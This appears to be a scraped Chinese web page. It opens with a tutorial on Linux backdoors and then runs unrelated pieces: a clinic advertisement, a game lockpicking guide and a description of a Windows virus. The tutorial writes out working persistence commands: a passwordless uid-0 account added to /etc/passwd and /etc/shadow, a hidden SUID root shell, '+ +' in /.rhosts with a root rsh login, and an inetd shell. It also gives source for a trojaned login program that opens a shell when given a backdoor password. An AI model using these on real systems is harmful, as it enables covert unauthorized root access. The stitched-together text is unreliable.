以下的文章主要描述的是Linux后门技术及实践方法,假如你在实际操作中遇到Linux后门技术,但是你却不知道对Linux后门技术如何正确的解决,那么以下的文章对你而言一定是良师益友。以下就是文章的主要内容描述。
后门简介
入侵者完全控制系统后,为方便下次进入而采用的一种技术。
一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。
Linux后门技术
增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
利用系统服务程序
TCP/UDP/ICMP Shell
Crontab定时任务
共享库文件
工具包rootkit
可装载内核模块(LKM)
增加超级用户 # echo “e4gle:x:0:0::/:/bin/sh” >> /etc/passwd
# echo “e4gle::-1:-1:-1:-1:-1:-1:500” >> /etc/shADOw
如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。
破解/嗅探用户密码
获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、FTP等端口,收集用户密码。
放置SUID Shell # cp /bin/bash /dev/.rootshell
# chmod u+s /dev/.rootshell
普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。 rhosts + +
# echo “+ +” > /.rhosts
# rsh -l root victim.com csh -i
远程可以得到一个rootshell。
利用系统服务程序
修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序
重定向login程序
TCP/UDP/ICMP Shell
BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。
TCP ACK数据包后门,能够穿越防火墙。
Crontab定时任务
Linux后门技术中通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。
共享库文件
在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验
工具包rootkit
包含一系列系统及后门工具:
清除日志中的登录记录
伪装校验和
替换netstat、ps等网络工具
后门登录程序易于安装和使用
可装载内核模块(LKM)
LKM:Loadable Kernel Modules 动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。
著名的LKM包有adore和knark。
后门的检测
以自己的经验,结合特定的工具,手工作一些检测。
使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网络连接。
实例:login后门
入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型
传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。
最简单的login后门ulogin.c源代码如下:
实例:login后门 #include
#define PASSWORD “passWORD”
#define _PATH_LOGIN “/sbin/logins”
main (argc, argv, envp)
char **argv, **envp;
char *display = getenv(“DISPLAY”);
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
if (!strcmp(display,PASSWORD)) {
system(“/bin/csh”);
execve(_PATH_LOGIN, argv, envp);
以上的相关内容就是对Linux后门技术及实践方法谈完整版的介绍,望你能有所收获。
做人流哪里好
还未生育,做人流哪里好?
选择瑞安定点人流医院,专业人流医院,在瑞安市安阳新区安强路,市政府后门,万松游泳池和公管所中间,瑞安女性公认最佳人流医院——瑞安华东医院,医院才用安妮产道维护型无痛人流,是由世界卫生组织大力推荐的最新型安全解除意外妊娠技术。
安妮产道维护型无痛人流,是一种对女性生殖 道、子宫等器官全方面维护的新术式理念,能够避免人流前后可能造成的各类并发症和后遗症,该技术结合了可视直观系统和超微管的双重优势,是舒适度更高、安 全系数更强、痛苦最小、术后康复快等“360度立体疗法新技术”。整个过程更注重对产道的维护,全面呵护女性健康,尤其适用于未生育的女性。
开锁141DZ哪练
练开锁的话可以去问主城的卫兵,他们会给你的当前的开锁级别可以去那里练级。 132应该是在希尔斯布莱德那里的敦霍尔德城堡里面,上下两层也有不少箱子可以练,下层的技能要求低一些,上层的好像到150会变成绿色。 如果你是lm,130去联盟的诺莫瑞根后门,开了一次,然后去偷一圈,每偷一个敌人,有大概20%几率门重置,所以,一般偷4-5个人,然后去开一次后门,重复上面步骤,一直练到变灰。 除了这个途径之外,还有更方便快速的提升开锁熟练的方法,就是盗贼制毒任务需要打开的箱子。 完成了制毒任务之后箱子不再显示为可开,但是只要使用开锁技能,再将鼠标移动到箱子上,这时候仍然可以打开箱子。 用这个方法大概可以将开锁熟练提高到175。 注意开箱子依然会中毒,让会解毒的职业解下就好了。 诺莫瑞根后门:前门知道怎么去么?有个叉路口,往左拐就是去前门的路,一直走就是去后门的路
机器狗病毒特性是什么??
病毒名称:“AV终结者”病毒与熊猫烧香过于“张扬”的特点不同,“AV终结者”的攻击手段更为隐蔽,用户如果感染了该病毒,所有杀毒软件将被禁用;想用搜索引擎去查找一些解决办法,输入“杀毒”字样,浏览器窗口遂被关掉;安全模式也会遭破坏,甚至格式化系统盘重装后很容易被再次感染;更为严重的是,该病毒可在用户电脑安全性丧失殆尽的情况下下载大量盗号木马、风险程序,给用户的网络资产带来严峻威胁。 附“AV终结者”病毒八大病毒特征:1. 生成很多8位数字或字母随机命名的病毒程序文件,并在电脑开机时自动运行。 2. 绑架安全软件,中毒后会发现几乎所有杀毒软件,系统管理工具,反间谍软件不能正常启动。 即使手动删除了病毒程序,下次启动这些软件时,还会报错。 3. 不能正常显示隐藏文件,其目的是更好的隐藏自身不被发现。 4. 禁用windows自动更新和Windows防火墙,这样木马下载器工作时,就不会有任何提示窗口弹出来。 为该病毒的下一步破坏打开方便之门。 5. 破坏系统安全模式,使得用户不能启动系统到安全模式来维护和修复6. 当前活动窗口中有杀毒、安全、社区相关的关键字时,病毒会关闭这些窗口。 假如你想通过浏览器搜索有关病毒的关键字,浏览器窗口会自动关闭。 7. 在本地硬盘、U盘或移动硬盘生成和相应的病毒程序文件,通过自动播放功能进行传播。 这里要注意的是,很多用户格式化系统分区后重装,访问其它磁盘,立即再次中毒,用户会感觉这病毒格式化也不管用。 8. 病毒程序的最终目的是下载更多木马、后门程序。 用户最后受损失的情况取决于这些木马和后门程序。
发表评论